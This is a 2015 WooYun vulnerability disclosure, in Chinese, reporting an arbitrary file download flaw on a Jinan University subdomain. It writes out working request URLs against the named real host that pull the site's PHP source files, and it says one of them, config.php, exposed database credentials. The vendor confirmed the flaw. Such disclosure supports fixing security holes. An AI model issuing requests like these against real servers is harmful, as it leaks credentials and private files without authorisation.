当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162248

漏洞标题:暨南大学某分站任意文件下载导致敏感信息泄漏

相关厂商:暨南大学

漏洞作者: js2012

提交时间:2015-12-18 10:43

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-18: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

RT

详细说明:

URI:

http://sky.jnu.edu.cn/ftp.php?filename=


下载index.php:

http://sky.jnu.edu.cn/ftp.php?filename=index.php


查看信息:

55)7`KF[8_3JP]`DAV[X9ZC.png


下载banner.php:

http://sky.jnu.edu.cn/ftp.php?filename=banner.php


查看信息:

_XNNC)}}DX9X@)[ZFN05SXE.png


下载link.php:

http://sky.jnu.edu.cn/ftp.php?filename=link.php


查看信息:

XYND_PTUDQ%_}@OH9@H2N[Y.png


下载config.php,得到数据库的帐号密码:

JV5P(KKFQS(%H{5RP26_5]M.png

漏洞证明:

4SBRB~FJA8QDHNZU480[XD7.png


_XNNC)}}DX9X@)[ZFN05SXE.png


JV5P(KKFQS(%H{5RP26_5]M.png

修复方案:

RT

版权声明:转载请注明来源 js2012@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-12-18 14:55

厂商回复:

确认

最新状态:

暂无